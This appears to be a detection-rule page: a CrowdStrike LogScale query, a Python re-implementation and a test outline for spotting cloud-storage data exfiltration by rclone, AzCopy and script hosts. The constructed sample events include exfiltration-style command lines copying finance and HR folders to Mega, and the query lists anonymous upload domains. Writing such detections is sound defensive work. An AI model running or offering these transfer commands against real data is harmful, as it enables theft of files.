THREAT-CloudStorage-DataExfil (CrowdStrike LogScale)

Detect Data Exfiltration via Cloud Storage Services in CrowdStrike LogScale

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).

MITRE ATT&CK

Tactic
Exfiltration

LogScale Detection Query

Platform: CrowdStrike LogScale (query language: CQL)
#event_simpleName=ProcessRollup2
| ImageFileName=/(?i)rclone\.exe$/
  OR (ImageFileName=/(?i)azcopy\.exe$/ AND CommandLine=/(?i)(blob|file|queue)\.core\.windows\.net/)
  OR (ImageFileName=/(?i)(powershell|pwsh|curl|wscript|cscript)\.exe$/
      AND CommandLine=/(?i)(mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|box\.com|box\.net|drive\.google\.com|onedrive\.live\.com|sharefile\.com|sendspace\.com|filebin\.net|anonfiles\.com)/)
| case {
    ImageFileName=/(?i)rclone/ | ThreatType := "Exfil_Rclone";
    ImageFileName=/(?i)azcopy/ | ThreatType := "Exfil_AzCopy";
    * | ThreatType := "Exfil_CloudStorage"
  }
| case {
    ThreatType = "Exfil_Rclone" | RiskScore := 85;
    ThreatType = "Exfil_AzCopy" | RiskScore := 80;
    * | RiskScore := 70
  }
| groupBy(
    [ComputerName, UserName, ImageFileName, ThreatType],
    function=[
      count(as=EventCount),
      max(field=RiskScore, as=MaxRisk),
      collect(CommandLine, limit=10)
    ]
  )
| sort(field=MaxRisk, order=desc)
Severity: high. Confidence: high.

CrowdStrike LogScale (Falcon) detection query using ProcessRollup2 endpoint telemetry to identify cloud storage data exfiltration. It matches rclone.exe execution (a high-fidelity indicator used by Akira, Black Basta, and Scattered Spider affiliates), AzCopy with Azure storage account URLs, and PowerShell, curl, or script-host commands referencing cloud storage and anonymous upload domains. Results are aggregated by host, user, image and threat type to expose campaign-level activity, with up to 10 distinct command lines collected per group for analyst review and groups sorted by the highest risk score.

Data Sources

CrowdStrike Falcon Endpoint Protection
CrowdStrike LogScale
Falcon ProcessRollup2 Telemetry

Required Tables

ProcessRollup2

False Positives & Tuning

  • Authorized data migration service accounts: infrastructure teams running rclone under named service accounts for approved cloud migrations — tag the source hosts with a Falcon host group (e.g., 'authorized-migration-hosts') and add a NOT ComputerName in authorized_migration_hosts filter before the groupBy to suppress known-good systems
  • Azure DevOps or GitHub Actions build agents: AzCopy executed by CI/CD runners for artifact deployment to Azure Blob Storage — use Falcon host tags to identify pipeline runner systems and exclude their ComputerName values, while retaining events in a lower-priority audit groupBy for compliance logging
  • Desktop sync client background processes: Dropbox, Box, or OneDrive sync daemons spawning curl or PowerShell subprocesses for authentication and sync operations — inspect the ParentBaseFileName field to distinguish sync daemon child processes from user-initiated or script-driven executions, and add ParentBaseFileName NOT IN ('Dropbox.exe', 'Box.exe', 'OneDrive.exe') to the filter
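The query's filter, case blocks and groupBy, together with the sync-client parent and authorized-host exclusions described under tuning, re-implemented in Python as an added example (not the page's or CrowdStrike's code) so the patterns can be checked offline before deployment. The events, host names, user names and command lines are constructed, and the authorized_hosts set stands in for the Falcon host group the tuning section describes.

```python
import re
# Constructed sample events shaped like Falcon ProcessRollup2 fields (not real telemetry).
EVENTS = [
    {"ComputerName": "WS-042", "UserName": "jdoe", "ParentBaseFileName": "cmd.exe",
     "ImageFileName": r"C:\Tools\rclone.exe", "CommandLine": r"rclone.exe copy D:\Finance mega:staging"},
    {"ComputerName": "WS-042", "UserName": "jdoe", "ParentBaseFileName": "cmd.exe",
     "ImageFileName": r"C:\Tools\rclone.exe", "CommandLine": r"rclone.exe sync D:\HR mega:staging"},
    {"ComputerName": "BUILD-01", "UserName": "svc_ci", "ParentBaseFileName": "Runner.Worker.exe",
     "ImageFileName": r"C:\Agent\azcopy.exe", "CommandLine": "azcopy.exe copy out https://ci.blob.core.windows.net/drops"},
    {"ComputerName": "WS-077", "UserName": "asmith", "ParentBaseFileName": "Dropbox.exe",
     "ImageFileName": r"C:\Windows\System32\curl.exe", "CommandLine": "curl.exe https://api.dropboxapi.com/2/users/get_current_account"},
    {"ComputerName": "WS-077", "UserName": "asmith", "ParentBaseFileName": "explorer.exe",
     "ImageFileName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Invoke-WebRequest -Uri https://mega.nz/CONSTRUCTED"},
]
# Same patterns as the LogScale query; the inline (?i) flag becomes re.I.
RCLONE = re.compile(r"rclone\.exe$", re.I)
AZCOPY = re.compile(r"azcopy\.exe$", re.I)
AZ_STORAGE = re.compile(r"(blob|file|queue)\.core\.windows\.net", re.I)
SCRIPT_HOST = re.compile(r"(powershell|pwsh|curl|wscript|cscript)\.exe$", re.I)
CLOUD_DOMAIN = re.compile(r"mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|box\.com|box\.net|"
                          r"drive\.google\.com|onedrive\.live\.com|sharefile\.com|sendspace\.com|filebin\.net|anonfiles\.com", re.I)
SYNC_PARENTS = {"dropbox.exe", "box.exe", "onedrive.exe"}  # sync-client parents excluded under tuning

# Mirror the filter and the two case blocks: return (ThreatType, RiskScore), or None when unmatched.
def classify(ev):
    img, cmd = ev["ImageFileName"], ev["CommandLine"]
    if RCLONE.search(img):
        return "Exfil_Rclone", 85
    if AZCOPY.search(img) and AZ_STORAGE.search(cmd):
        return "Exfil_AzCopy", 80
    if SCRIPT_HOST.search(img) and CLOUD_DOMAIN.search(cmd):
        return "Exfil_CloudStorage", 70
    return None

# Apply the tuning exclusions, then groupBy host/user/image/type and sort by MaxRisk like the query.
def detect(events, authorized_hosts=frozenset()):
    groups = {}
    for ev in events:
        if ev["ComputerName"] in authorized_hosts or ev["ParentBaseFileName"].lower() in SYNC_PARENTS:
            continue  # approved migration/CI hosts and sync-daemon child processes are suppressed
        if (hit := classify(ev)) is None:
            continue
        key = (ev["ComputerName"], ev["UserName"], ev["ImageFileName"], hit[0])
        g = groups.setdefault(key, {"EventCount": 0, "MaxRisk": 0, "CommandLines": []})
        g["EventCount"] += 1
        g["MaxRisk"] = max(g["MaxRisk"], hit[1])
        if ev["CommandLine"] not in g["CommandLines"] and len(g["CommandLines"]) < 10:
            g["CommandLines"].append(ev["CommandLine"])  # collect(CommandLine, limit=10)
    return sorted(groups.items(), key=lambda kv: kv[1]["MaxRisk"], reverse=True)
```

With the constructed events, the curl child of Dropbox.exe matches the filter but is dropped by the parent exclusion, and passing authorized_hosts={"BUILD-01"} removes the CI runner's AzCopy row.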

Testing Methodology

Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.
